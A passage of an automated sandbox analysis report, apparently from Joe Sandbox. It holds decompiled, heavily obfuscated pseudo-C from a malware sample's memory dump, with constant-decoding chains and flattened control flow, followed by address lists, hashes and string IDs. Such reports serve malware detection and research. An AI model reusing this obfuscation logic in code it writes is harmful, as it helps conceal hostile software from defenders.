                                                                                                                                  				_v180 = _v180 | 0xb0d6dc69;
                                                                                                                                  				_v180 = _v180 + 0xffffa02a;
                                                                                                                                  				_v180 = _v180 | 0x7fd27f38;
                                                                                                                                  				_v180 = _v180 ^ 0xffd81443;
                                                                                                                                  				_v152 = 0x628374;
                                                                                                                                  				_v152 = _v152 >> 2;
                                                                                                                                  				_v152 = _v152 + 0xffff73d9;
                                                                                                                                  				_t966 = 0x2e;
                                                                                                                                  				_v152 = _v152 / _t966;
                                                                                                                                  				_v152 = _v152 ^ 0x0001ef4a;
                                                                                                                                  				_v28 = 0xe4a1af;
                                                                                                                                  				_v28 = _v28 + 0x32bc;
                                                                                                                                  				_v28 = _v28 ^ 0x00ec33da;
                                                                                                                                  				_v160 = 0x595a50;
                                                                                                                                  				_v160 = _v160 + 0xffffdbfa;
                                                                                                                                  				_v160 = _v160 + 0xffffb344;
                                                                                                                                  				_t967 = 0x36;
                                                                                                                                  				_v160 = _v160 / _t967;
                                                                                                                                  				_v160 = _v160 ^ 0x0006861f;
                                                                                                                                  				_v88 = 0x4d7ad3;
                                                                                                                                  				_v88 = _v88 + 0xc28a;
                                                                                                                                  				_v88 = _v88 ^ 0x004ca34c;
                                                                                                                                  				_v48 = 0xf1782b;
                                                                                                                                  				_v48 = _v48 ^ 0xe8a77c51;
                                                                                                                                  				_v48 = _v48 ^ 0xe85593aa;
                                                                                                                                  				_v100 = 0x42ea8e;
                                                                                                                                  				_t985 = 0x2a;
                                                                                                                                  				_v100 = _v100 / _t985;
                                                                                                                                  				_v100 = _v100 ^ 0x000caa85;
                                                                                                                                  				_v148 = 0xa48e68;
                                                                                                                                  				_t968 = 6;
                                                                                                                                  				_v148 = _v148 / _t968;
                                                                                                                                  				_v148 = _v148 << 0xc;
                                                                                                                                  				_v148 = _v148 ^ 0xb6d58e9e;
                                                                                                                                  				_v252 = 0x4ff2e7;
                                                                                                                                  				_t969 = 0xc;
                                                                                                                                  				_v252 = _v252 / _t969;
                                                                                                                                  				_v252 = _v252 << 6;
                                                                                                                                  				_v252 = _v252 << 0xc;
                                                                                                                                  				_v252 = _v252 ^ 0xa6466867;
                                                                                                                                  				_v80 = 0x4d7637;
                                                                                                                                  				_v80 = _v80 + 0xd199;
                                                                                                                                  				_v80 = _v80 ^ 0x004dfa45;
                                                                                                                                  				_v24 = 0xfee4b3;
                                                                                                                                  				_t970 = 0x3e;
                                                                                                                                  				_v24 = _v24 * 0x23;
                                                                                                                                  				_v24 = _v24 ^ 0x22d37c34;
                                                                                                                                  				_v204 = 0x24209;
                                                                                                                                  				_v204 = _v204 + 0xffffcebc;
                                                                                                                                  				_v204 = _v204 ^ 0x847f2e61;
                                                                                                                                  				_v204 = _v204 + 0xffff5302;
                                                                                                                                  				_v204 = _v204 ^ 0x847f4f7c;
                                                                                                                                  				_v260 = 0x4a587;
                                                                                                                                  				_v260 = _v260 * 0x4a;
                                                                                                                                  				_v260 = _v260 + 0xffff9bf3;
                                                                                                                                  				_v260 = _v260 + 0xffff92e5;
                                                                                                                                  				_v260 = _v260 ^ 0x015b504d;
                                                                                                                                  				_v164 = 0x6d05db;
                                                                                                                                  				_v164 = _v164 * 0x14;
                                                                                                                                  				_v164 = _v164 >> 4;
                                                                                                                                  				_v164 = _v164 ^ 0x556abaa4;
                                                                                                                                  				_v164 = _v164 ^ 0x55e01079;
                                                                                                                                  				_v20 = 0x80cc5b;
                                                                                                                                  				_v20 = _v20 >> 0xd;
                                                                                                                                  				_v20 = _v20 ^ 0x000efc86;
                                                                                                                                  				_v104 = 0xc8e6e2;
                                                                                                                                  				_v104 = _v104 << 8;
                                                                                                                                  				_v104 = _v104 >> 0x10;
                                                                                                                                  				_v104 = _v104 ^ 0x000afff3;
                                                                                                                                  				_v272 = 0x560e69;
                                                                                                                                  				_v272 = _v272 + 0x2793;
                                                                                                                                  				_v272 = _v272 * 0xe;
                                                                                                                                  				_v272 = _v272 + 0xc902;
                                                                                                                                  				_v272 = _v272 ^ 0x04bc6edc;
                                                                                                                                  				_v16 = 0xfcaf67;
                                                                                                                                  				_v16 = _v16 / _t970;
                                                                                                                                  				_v16 = _v16 ^ 0x000c0ba9;
                                                                                                                                  				_v56 = 0x81a14f;
                                                                                                                                  				_v56 = _v56 >> 0xb;
                                                                                                                                  				_v56 = _v56 ^ 0x000fb9cd;
                                                                                                                                  				_v32 = 0x24333c;
                                                                                                                                  				_v32 = _v32 / _t985;
                                                                                                                                  				_v32 = _v32 ^ 0x00065bee;
                                                                                                                                  				_v124 = 0xe3a445;
                                                                                                                                  				_v124 = _v124 >> 5;
                                                                                                                                  				_v124 = _v124 >> 7;
                                                                                                                                  				_v124 = _v124 ^ 0x0000dfdf;
                                                                                                                                  				_v220 = 0x5f21d9;
                                                                                                                                  				_t971 = 0x79;
                                                                                                                                  				_v220 = _v220 * 0x54;
                                                                                                                                  				_v220 = _v220 << 5;
                                                                                                                                  				_v220 = _v220 ^ 0x0e372a7b;
                                                                                                                                  				_v220 = _v220 ^ 0xe8dc9c41;
                                                                                                                                  				_v188 = 0xc44d01;
                                                                                                                                  				_v188 = _v188 ^ 0x0373dd04;
                                                                                                                                  				_v188 = _v188 * 0x30;
                                                                                                                                  				_v188 = _v188 ^ 0xfb03bbf0;
                                                                                                                                  				_v188 = _v188 ^ 0x496460ca;
                                                                                                                                  				_v268 = 0x8213af;
                                                                                                                                  				_v268 = _v268 ^ 0x6d9501b2;
                                                                                                                                  				_v268 = _v268 | 0x4d165578;
                                                                                                                                  				_v268 = _v268 >> 4;
                                                                                                                                  				_v268 = _v268 ^ 0x06d55fab;
                                                                                                                                  				_v212 = 0x705526;
                                                                                                                                  				_v212 = _v212 >> 0xa;
                                                                                                                                  				_v212 = _v212 << 9;
                                                                                                                                  				_v212 = _v212 >> 8;
                                                                                                                                  				_v212 = _v212 ^ 0x000b72c4;
                                                                                                                                  				_v92 = 0xc8093b;
                                                                                                                                  				_v92 = _v92 + 0xd043;
                                                                                                                                  				_v92 = _v92 ^ 0x00ca3bde;
                                                                                                                                  				_v264 = 0x1f9619;
                                                                                                                                  				_v264 = _v264 + 0xffffbc34;
                                                                                                                                  				_v264 = _v264 * 0x3e;
                                                                                                                                  				_v264 = _v264 * 0x52;
                                                                                                                                  				_v264 = _v264 ^ 0x6e0edc82;
                                                                                                                                  				_v96 = 0x6d9960;
                                                                                                                                  				_v96 = _v96 | 0x9fb7a8f9;
                                                                                                                                  				_v96 = _v96 ^ 0x9ff35e32;
                                                                                                                                  				_v144 = 0x447df2;
                                                                                                                                  				_v144 = _v144 << 8;
                                                                                                                                  				_v144 = _v144 + 0xffff6cb2;
                                                                                                                                  				_v144 = _v144 ^ 0x44714589;
                                                                                                                                  				_v240 = 0x65db08;
                                                                                                                                  				_v240 = _v240 * 6;
                                                                                                                                  				_v240 = _v240 + 0x5f97;
                                                                                                                                  				_v240 = _v240 >> 0xd;
                                                                                                                                  				_v240 = _v240 ^ 0x000293b4;
                                                                                                                                  				_v84 = 0x3c7c20;
                                                                                                                                  				_v84 = _v84 ^ 0x2c3d49c2;
                                                                                                                                  				_v84 = _v84 ^ 0x2c080053;
                                                                                                                                  				_v248 = 0x13c85;
                                                                                                                                  				_v248 = _v248 + 0x8cd8;
                                                                                                                                  				_v248 = _v248 + 0x6e3d;
                                                                                                                                  				_v248 = _v248 ^ 0xe59eace5;
                                                                                                                                  				_v248 = _v248 ^ 0xe5984999;
                                                                                                                                  				_v216 = 0x6164ef;
                                                                                                                                  				_v216 = _v216 << 6;
                                                                                                                                  				_v216 = _v216 + 0xffff2edc;
                                                                                                                                  				_v216 = _v216 | 0xa66c888f;
                                                                                                                                  				_v216 = _v216 ^ 0xbe7947d5;
                                                                                                                                  				_v232 = 0x991e82;
                                                                                                                                  				_v232 = _v232 + 0xffff48fb;
                                                                                                                                  				_v232 = _v232 >> 0xe;
                                                                                                                                  				_v232 = _v232 | 0x69e4ac2c;
                                                                                                                                  				_v232 = _v232 ^ 0x69ef7d1b;
                                                                                                                                  				_v68 = 0x9d94b2;
                                                                                                                                  				_v68 = _v68 | 0xcead792c;
                                                                                                                                  				_v68 = _v68 ^ 0xceb9e800;
                                                                                                                                  				_v44 = 0x20071e;
                                                                                                                                  				_v44 = _v44 / _t971;
                                                                                                                                  				_v44 = _v44 ^ 0x000a654c;
                                                                                                                                  				_v128 = 0x223cb7;
                                                                                                                                  				_v128 = _v128 + 0x9bf0;
                                                                                                                                  				_v128 = _v128 | 0x79b7d361;
                                                                                                                                  				_v128 = _v128 ^ 0x79b3b147;
                                                                                                                                  				_v52 = 0x8ed203;
                                                                                                                                  				_v52 = _v52 + 0xffff1a7b;
                                                                                                                                  				_v52 = _v52 ^ 0x008be8c4;
                                                                                                                                  				_v208 = 0xe0ac17;
                                                                                                                                  				_v208 = _v208 ^ 0xbcfe8cf2;
                                                                                                                                  				_t972 = 0x6b;
                                                                                                                                  				_v208 = _v208 / _t972;
                                                                                                                                  				_v208 = _v208 | 0x3ee9ec5f;
                                                                                                                                  				_v208 = _v208 ^ 0x3fec9c1d;
                                                                                                                                  				_v192 = 0x219bfa;
                                                                                                                                  				_v192 = _v192 >> 4;
                                                                                                                                  				_v192 = _v192 + 0x77e4;
                                                                                                                                  				_v192 = _v192 | 0x2fb4141c;
                                                                                                                                  				_v192 = _v192 ^ 0x2fb2076e;
                                                                                                                                  				_v200 = 0x8926e2;
                                                                                                                                  				_v200 = _v200 << 4;
                                                                                                                                  				_t973 = 0xc;
                                                                                                                                  				_v200 = _v200 / _t973;
                                                                                                                                  				_v200 = _v200 + 0xffff5704;
                                                                                                                                  				_v200 = _v200 ^ 0x00bbfbcc;
                                                                                                                                  				_v284 = 0xaed0cb;
                                                                                                                                  				_v284 = _v284 + 0x9c17;
                                                                                                                                  				_v284 = _v284 + 0xaf6d;
                                                                                                                                  				_v284 = _v284 ^ 0x00b89bc1;
                                                                                                                                  				_v168 = 0x914ce9;
                                                                                                                                  				_v168 = _v168 | 0xceb3d4af;
                                                                                                                                  				_v168 = _v168 ^ 0x5adaba1c;
                                                                                                                                  				_v168 = _v168 ^ 0x3c292fbf;
                                                                                                                                  				_v168 = _v168 ^ 0xa84ea968;
                                                                                                                                  				_v156 = 0x90c891;
                                                                                                                                  				_v156 = _v156 + 0xffff3667;
                                                                                                                                  				_t974 = 0x5c;
                                                                                                                                  				_v156 = _v156 / _t974;
                                                                                                                                  				_t975 = 0x3c;
                                                                                                                                  				_v156 = _v156 / _t975;
                                                                                                                                  				_v156 = _v156 ^ 0x000da682;
                                                                                                                                  				_v140 = 0xffcb83;
                                                                                                                                  				_v140 = _v140 << 0xd;
                                                                                                                                  				_v140 = _v140 | 0xcebab625;
                                                                                                                                  				_v140 = _v140 ^ 0xfff71570;
                                                                                                                                  				_v280 = 0xfef1ee;
                                                                                                                                  				_v280 = _v280 >> 8;
                                                                                                                                  				_v280 = _v280 + 0xffff306e;
                                                                                                                                  				_v280 = _v280 | 0x3331510b;
                                                                                                                                  				_v280 = _v280 ^ 0x3338227a;
                                                                                                                                  				_v176 = 0xc7331d;
                                                                                                                                  				_v176 = _v176 >> 7;
                                                                                                                                  				_v176 = _v176 + 0x1d50;
                                                                                                                                  				_v176 = _v176 << 5;
                                                                                                                                  				_v176 = _v176 ^ 0x00370898;
                                                                                                                                  				_v288 = 0x519041;
                                                                                                                                  				_v288 = _v288 + 0x7cd9;
                                                                                                                                  				_v288 = _v288 ^ 0x0057f5a9;
                                                                                                                                  				_t976 = _v12;
                                                                                                                                  				_t986 = _v12;
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					_t939 = 0x68a9e90;
                                                                                                                                  					while(1) {
                                                                                                                                  						_t823 = _v184;
                                                                                                                                  						while(1) {
                                                                                                                                  							L3:
                                                                                                                                  							_t991 = _t977 - _t939;
                                                                                                                                  							if(_t991 > 0) {
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							if(_t991 == 0) {
                                                                                                                                  								__eflags =  *_v8;
                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                  									_push(_v104);
                                                                                                                                  									_push(_v20);
                                                                                                                                  									_t868 = E002EDCF7(_v164, 0x2d1524, __eflags);
                                                                                                                                  									_v276 = _t868;
                                                                                                                                  								}
                                                                                                                                  								_t845 = _v244 | _v196 | _v108 | _v236 | _v132 | _v172 | _v64 | _v228 | _v116;
                                                                                                                                  								_t981 = _a44 & 1;
                                                                                                                                  								__eflags = _t981;
                                                                                                                                  								if(_t981 != 0) {
                                                                                                                                  									__eflags = _t845;
                                                                                                                                  								}
                                                                                                                                  								_push(_t868);
                                                                                                                                  								_t976 = E002D75FA(_t868, _t845, _v272, _t868, _v16, _a16, _v56, _v32, _v124, _t868, _v220, _v188, _v184);
                                                                                                                                  								E002DA8B0(_v268, _v276, _v212);
                                                                                                                                  								_t988 =  &(_t988[0xe]);
                                                                                                                                  								__eflags = _t976;
                                                                                                                                  								if(_t976 == 0) {
                                                                                                                                  									_t977 = 0x51daea9;
                                                                                                                                  								} else {
                                                                                                                                  									_push(_v96);
                                                                                                                                  									_push(_v264);
                                                                                                                                  									_push(_v256);
                                                                                                                                  									_v60 = 1;
                                                                                                                                  									_push( &_v60);
                                                                                                                                  									_push(_v92);
                                                                                                                                  									_t948 = 4;
                                                                                                                                  									E002D9670(_t976, _t948);
                                                                                                                                  									_t988 =  &(_t988[5]);
                                                                                                                                  									__eflags = _t981;
                                                                                                                                  									if(_t981 != 0) {
                                                                                                                                  										E002E408E( &_v12, _v76, _v144, _v240, _t976,  &_v60, _v84, _v248);
                                                                                                                                  										_t732 =  &_v60;
                                                                                                                                  										 *_t732 = _v60 | _v136;
                                                                                                                                  										__eflags =  *_t732;
                                                                                                                                  										E002D9670(_t976, _v12, _v216,  &_v60, _v224, _v232, _v68);
                                                                                                                                  										_t988 =  &(_t988[0xb]);
                                                                                                                                  									}
                                                                                                                                  									_t977 = 0xbee37f5;
                                                                                                                                  								}
                                                                                                                                  								L11:
                                                                                                                                  								_t868 = _v276;
                                                                                                                                  								goto L1;
                                                                                                                                  							}
                                                                                                                                  							if(_t977 == 0x2602436) {
                                                                                                                                  								_t977 = 0x506ebc3;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							if(_t977 == 0x329d839) {
                                                                                                                                  								_t977 = 0x2602436;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							if(_t977 == 0x4bb42fe) {
                                                                                                                                  								_t823 = E002D88C3(_v100, _v148, _v40, _t868, _t868, _t986, _v252, _v80, _a36, _v24, _t868, _v4, _t868, _v204, _v260);
                                                                                                                                  								_t868 = _v276;
                                                                                                                                  								_t988 =  &(_t988[0xd]);
                                                                                                                                  								__eflags = _t823;
                                                                                                                                  								_v184 = _t823;
                                                                                                                                  								_t939 = 0x68a9e90;
                                                                                                                                  								_t977 =  !=  ? 0x68a9e90 : 0x9a35046;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							if(_t977 == 0x506ebc3) {
                                                                                                                                  								_push(_t868);
                                                                                                                                  								_push(_v72);
                                                                                                                                  								_push(_v160);
                                                                                                                                  								_push(_v28);
                                                                                                                                  								_push(_v152);
                                                                                                                                  								_t858 = E002EDAC6(_v112, _v180);
                                                                                                                                  								_t986 = _t858;
                                                                                                                                  								__eflags = _t858;
                                                                                                                                  								_t977 =  !=  ? 0x4bb42fe : 0xdf8c541;
                                                                                                                                  								E002E8519(_v88, _v48, 0);
                                                                                                                                  								_t988 = _t988 - 0xc + 0x24;
                                                                                                                                  								L37:
                                                                                                                                  								_t868 = _v276;
                                                                                                                                  								_t939 = 0x68a9e90;
                                                                                                                                  								L38:
                                                                                                                                  								__eflags = _t977 - 0xdf8c541;
                                                                                                                                  								if(_t977 == 0xdf8c541) {
                                                                                                                                  									L41:
                                                                                                                                  									return _t862;
                                                                                                                                  								}
                                                                                                                                  								_t823 = _v184;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							if(_t977 != 0x51daea9) {
                                                                                                                                  								goto L38;
                                                                                                                                  							}
                                                                                                                                  							E002D2B62(_v168, _t823, _v156, _v140);
                                                                                                                                  							_t977 = 0x9a35046;
                                                                                                                                  							goto L11;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t977 - 0x81a6b17;
                                                                                                                                  						if(_t977 == 0x81a6b17) {
                                                                                                                                  							E002D2B62(_v192, _t976, _v200, _v284);
                                                                                                                                  							_t977 = 0x51daea9;
                                                                                                                                  							goto L37;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t977 - 0x9a35046;
                                                                                                                                  						if(_t977 == 0x9a35046) {
                                                                                                                                  							E002D2B62(_v280, _t986, _v176, _v288);
                                                                                                                                  							goto L41;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t977 - 0xb70b8d2;
                                                                                                                                  						if(_t977 == 0xb70b8d2) {
                                                                                                                                  							__eflags = E002EA2E8(_t976, _a4);
                                                                                                                                  							_t977 = 0x81a6b17;
                                                                                                                                  							_t829 = 1;
                                                                                                                                  							_t862 =  !=  ? _t829 : _t862;
                                                                                                                                  							goto L11;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t977 - 0xba06d79;
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							__eflags = E002F09B5(_t976, _v120, __eflags) - _v36;
                                                                                                                                  							_t977 =  ==  ? 0xb70b8d2 : 0x81a6b17;
                                                                                                                                  							goto L11;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t977 - 0xbee37f5;
                                                                                                                                  						if(_t977 != 0xbee37f5) {
                                                                                                                                  							goto L38;
                                                                                                                                  						}
                                                                                                                                  						_t832 = _v8;
                                                                                                                                  						_t888 =  *_t832;
                                                                                                                                  						__eflags = _t888;
                                                                                                                                  						if(_t888 == 0) {
                                                                                                                                  							_t833 = 0;
                                                                                                                                  							__eflags = 0;
                                                                                                                                  						} else {
                                                                                                                                  							_t833 = _t832[1];
                                                                                                                                  						}
                                                                                                                                  						E002D2AE4(_v44, _t888, _t888, _a24, _t976, _v52, _t833, _v208);
                                                                                                                                  						_t988 =  &(_t988[7]);
                                                                                                                                  						asm("sbb esi, esi");
                                                                                                                                  						_t977 = (_t977 & 0x03860262) + 0x81a6b17;
                                                                                                                                  						goto L11;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  0x002ee859
                                                                                                                                  0x002ee861
                                                                                                                                  0x002ee869
                                                                                                                                  0x002ee874
                                                                                                                                  0x002ee87f
                                                                                                                                  0x002ee88a
                                                                                                                                  0x002ee895
                                                                                                                                  0x002ee8a0
                                                                                                                                  0x002ee8ab
                                                                                                                                  0x002ee8b6
                                                                                                                                  0x002ee8be
                                                                                                                                  0x002ee8d0
                                                                                                                                  0x002ee8d5
                                                                                                                                  0x002ee8de
                                                                                                                                  0x002ee8e9
                                                                                                                                  0x002ee8f4
                                                                                                                                  0x002ee8ff
                                                                                                                                  0x002ee90a
                                                                                                                                  0x002ee915
                                                                                                                                  0x002ee920
                                                                                                                                  0x002ee932
                                                                                                                                  0x002ee935
                                                                                                                                  0x002ee93c
                                                                                                                                  0x002ee947
                                                                                                                                  0x002ee952
                                                                                                                                  0x002ee95d
                                                                                                                                  0x002ee968
                                                                                                                                  0x002ee973
                                                                                                                                  0x002ee97e
                                                                                                                                  0x002ee989
                                                                                                                                  0x002ee99f
                                                                                                                                  0x002ee9a4
                                                                                                                                  0x002ee9ab
                                                                                                                                  0x002ee9b6
                                                                                                                                  0x002ee9ca
                                                                                                                                  0x002ee9cf
                                                                                                                                  0x002ee9d6
                                                                                                                                  0x002ee9de
                                                                                                                                  0x002ee9e9
                                                                                                                                  0x002ee9f7
                                                                                                                                  0x002ee9fc
                                                                                                                                  0x002eea00
                                                                                                                                  0x002eea05
                                                                                                                                  0x002eea0a
                                                                                                                                  0x002eea12
                                                                                                                                  0x002eea1d
                                                                                                                                  0x002eea28
                                                                                                                                  0x002eea33
                                                                                                                                  0x002eea48
                                                                                                                                  0x002eea49
                                                                                                                                  0x002eea50
                                                                                                                                  0x002eea5b
                                                                                                                                  0x002eea63
                                                                                                                                  0x002eea6b
                                                                                                                                  0x002eea73
                                                                                                                                  0x002eea7b
                                                                                                                                  0x002eea83
                                                                                                                                  0x002eea90
                                                                                                                                  0x002eea94
                                                                                                                                  0x002eea9c
                                                                                                                                  0x002eeaa4
                                                                                                                                  0x002eeaac
                                                                                                                                  0x002eeabf
                                                                                                                                  0x002eeac6
                                                                                                                                  0x002eeace
                                                                                                                                  0x002eead9
                                                                                                                                  0x002eeae4
                                                                                                                                  0x002eeaef
                                                                                                                                  0x002eeaf7
                                                                                                                                  0x002eeb02
                                                                                                                                  0x002eeb0d
                                                                                                                                  0x002eeb15
                                                                                                                                  0x002eeb1d
                                                                                                                                  0x002eeb28
                                                                                                                                  0x002eeb30
                                                                                                                                  0x002eeb3d
                                                                                                                                  0x002eeb41
                                                                                                                                  0x002eeb49
                                                                                                                                  0x002eeb51
                                                                                                                                  0x002eeb67
                                                                                                                                  0x002eeb6e
                                                                                                                                  0x002eeb79
                                                                                                                                  0x002eeb84
                                                                                                                                  0x002eeb8c
                                                                                                                                  0x002eeb97
                                                                                                                                  0x002eebab
                                                                                                                                  0x002eebb2
                                                                                                                                  0x002eebbd
                                                                                                                                  0x002eebc8
                                                                                                                                  0x002eebd2
                                                                                                                                  0x002eebda
                                                                                                                                  0x002eebe5
                                                                                                                                  0x002eebf4
                                                                                                                                  0x002eebf5
                                                                                                                                  0x002eebf9
                                                                                                                                  0x002eebfe
                                                                                                                                  0x002eec06
                                                                                                                                  0x002eec0e
                                                                                                                                  0x002eec16
                                                                                                                                  0x002eec23
                                                                                                                                  0x002eec27
                                                                                                                                  0x002eec2f
                                                                                                                                  0x002eec37
                                                                                                                                  0x002eec3f
                                                                                                                                  0x002eec47
                                                                                                                                  0x002eec4f
                                                                                                                                  0x002eec54
                                                                                                                                  0x002eec5c
                                                                                                                                  0x002eec64
                                                                                                                                  0x002eec69
                                                                                                                                  0x002eec6e
                                                                                                                                  0x002eec73
                                                                                                                                  0x002eec7b
                                                                                                                                  0x002eec86
                                                                                                                                  0x002eec91
                                                                                                                                  0x002eec9c
                                                                                                                                  0x002eeca4
                                                                                                                                  0x002eecb1
                                                                                                                                  0x002eecba
                                                                                                                                  0x002eecbe
                                                                                                                                  0x002eecc6
                                                                                                                                  0x002eecd1
                                                                                                                                  0x002eecdc
                                                                                                                                  0x002eece7
                                                                                                                                  0x002eecf2
                                                                                                                                  0x002eecfa
                                                                                                                                  0x002eed05
                                                                                                                                  0x002eed10
                                                                                                                                  0x002eed1d
                                                                                                                                  0x002eed21
                                                                                                                                  0x002eed29
                                                                                                                                  0x002eed2e
                                                                                                                                  0x002eed36
                                                                                                                                  0x002eed41
                                                                                                                                  0x002eed4c
                                                                                                                                  0x002eed57
                                                                                                                                  0x002eed5f
                                                                                                                                  0x002eed67
                                                                                                                                  0x002eed6f
                                                                                                                                  0x002eed77
                                                                                                                                  0x002eed7f
                                                                                                                                  0x002eed87
                                                                                                                                  0x002eed8c
                                                                                                                                  0x002eed94
                                                                                                                                  0x002eed9c
                                                                                                                                  0x002eeda4
                                                                                                                                  0x002eedac
                                                                                                                                  0x002eedb4
                                                                                                                                  0x002eedb9
                                                                                                                                  0x002eedc1
                                                                                                                                  0x002eedc9
                                                                                                                                  0x002eedd4
                                                                                                                                  0x002eeddf
                                                                                                                                  0x002eedea
                                                                                                                                  0x002eedfe
                                                                                                                                  0x002eee05
                                                                                                                                  0x002eee10
                                                                                                                                  0x002eee1b
                                                                                                                                  0x002eee26
                                                                                                                                  0x002eee31
                                                                                                                                  0x002eee3c
                                                                                                                                  0x002eee49
                                                                                                                                  0x002eee54
                                                                                                                                  0x002eee5f
                                                                                                                                  0x002eee67
                                                                                                                                  0x002eee75
                                                                                                                                  0x002eee7a
                                                                                                                                  0x002eee80
                                                                                                                                  0x002eee88
                                                                                                                                  0x002eee90
                                                                                                                                  0x002eee98
                                                                                                                                  0x002eee9d
                                                                                                                                  0x002eeea5
                                                                                                                                  0x002eeead
                                                                                                                                  0x002eeeb5
                                                                                                                                  0x002eeebd
                                                                                                                                  0x002eeec6
                                                                                                                                  0x002eeecb
                                                                                                                                  0x002eeed1
                                                                                                                                  0x002eeed9
                                                                                                                                  0x002eeee1
                                                                                                                                  0x002eeee9
                                                                                                                                  0x002eeef1
                                                                                                                                  0x002eeef9
                                                                                                                                  0x002eef01
                                                                                                                                  0x002eef0c
                                                                                                                                  0x002eef17
                                                                                                                                  0x002eef22
                                                                                                                                  0x002eef2d
                                                                                                                                  0x002eef38
                                                                                                                                  0x002eef43
                                                                                                                                  0x002eef55
                                                                                                                                  0x002eef5a
                                                                                                                                  0x002eef6a
                                                                                                                                  0x002eef6d
                                                                                                                                  0x002eef74
                                                                                                                                  0x002eef7f

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: |<$!b$$Fy$&Up$*b$7vM$<3$$=n$C$K1$Le$PZY$S$_>$z"83$u$0G$da$w
                                                                                                                                  • API String ID: 0-3417817227
                                                                                                                                  • Opcode ID: 2fed18e3830e6ee15e7f800dc22b3ae3822a3446c52a0cc414ef06bc8410d545
                                                                                                                                  • Instruction ID: f816bcd57e3effc503b276fe6521f2bf83562dd02c4bafdcbae8efc3acc3d702
                                                                                                                                  • Opcode Fuzzy Hash: 2fed18e3830e6ee15e7f800dc22b3ae3822a3446c52a0cc414ef06bc8410d545
                                                                                                                                  • Instruction Fuzzy Hash: 30820F71508381CFD378CF26C54AA8BBBE1BBD4718F10892DE6D996260D7B48959CF83
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002DBB7E(intOrPtr* __ecx) {
                                                                                                                                  				char _v68;
                                                                                                                                  				char _v76;
                                                                                                                                  				void* _v88;
                                                                                                                                  				intOrPtr _v92;
                                                                                                                                  				intOrPtr _v96;
                                                                                                                                  				intOrPtr* _v100;
                                                                                                                                  				char _v104;
                                                                                                                                  				char _v108;
                                                                                                                                  				char _v112;
                                                                                                                                  				char _v116;
                                                                                                                                  				char _v120;
                                                                                                                                  				signed int _v124;
                                                                                                                                  				signed int _v128;
                                                                                                                                  				signed int _v132;
                                                                                                                                  				signed int _v136;
                                                                                                                                  				signed int _v140;
                                                                                                                                  				signed int _v144;
                                                                                                                                  				signed int _v148;
                                                                                                                                  				signed int _v152;
                                                                                                                                  				signed int _v156;
                                                                                                                                  				signed int _v160;
                                                                                                                                  				signed int _v164;
                                                                                                                                  				signed int _v168;
                                                                                                                                  				signed int _v172;
                                                                                                                                  				signed int _v176;
                                                                                                                                  				signed int _v180;
                                                                                                                                  				signed int _v184;
                                                                                                                                  				signed int _v188;
                                                                                                                                  				signed int _v192;
                                                                                                                                  				signed int _v196;
                                                                                                                                  				signed int _v200;
                                                                                                                                  				_v148 = _v148 + 0x2800;
                                                                                                                                  				_v148 = _v148 ^ 0x00ec4a73;
                                                                                                                                  				_v180 = 0x28ed65;
                                                                                                                                  				_t276 =  &_v180; // 0x28ed65
                                                                                                                                  				_v180 =  *_t276 / _t740;
                                                                                                                                  				_v180 = _v180 ^ 0x0008a356;
                                                                                                                                  				_v340 = 0xb04f06;
                                                                                                                                  				_v340 = _v340 | 0x19ae51aa;
                                                                                                                                  				_v340 = _v340 + 0xffff0ab2;
                                                                                                                                  				_v340 = _v340 >> 7;
                                                                                                                                  				_v340 = _v340 ^ 0x003d7bf7;
                                                                                                                                  				_v252 = 0x779412;
                                                                                                                                  				_t741 = 0x28;
                                                                                                                                  				_v252 = _v252 / _t741;
                                                                                                                                  				_v252 = _v252 | 0x065d8c29;
                                                                                                                                  				_v252 = _v252 ^ 0x0653787d;
                                                                                                                                  				_v140 = 0x2cf99d;
                                                                                                                                  				_v140 = _v140 << 0xf;
                                                                                                                                  				_v140 = _v140 ^ 0x7ccdbf9f;
                                                                                                                                  				_v300 = 0xa5c7e2;
                                                                                                                                  				_v300 = _v300 ^ 0xf64f2b87;
                                                                                                                                  				_v300 = _v300 | 0xd6032566;
                                                                                                                                  				_v300 = _v300 << 7;
                                                                                                                                  				_v300 = _v300 ^ 0x75f4cdbc;
                                                                                                                                  				_v204 = 0xc71fe4;
                                                                                                                                  				_v204 = _v204 ^ 0x39f608ad;
                                                                                                                                  				_v204 = _v204 ^ 0x39346367;
                                                                                                                                  				_v332 = 0x26340b;
                                                                                                                                  				_t742 = 0xc;
                                                                                                                                  				_v332 = _v332 / _t742;
                                                                                                                                  				_v332 = _v332 >> 0xc;
                                                                                                                                  				_v332 = _v332 + 0x4006;
                                                                                                                                  				_v332 = _v332 ^ 0x00056ca9;
                                                                                                                                  				_v244 = 0xb4bdd0;
                                                                                                                                  				_v244 = _v244 ^ 0x9dcc8204;
                                                                                                                                  				_t743 = 0x5c;
                                                                                                                                  				_v244 = _v244 * 0x56;
                                                                                                                                  				_v244 = _v244 ^ 0xe668140d;
                                                                                                                                  				_v228 = 0xb7abf;
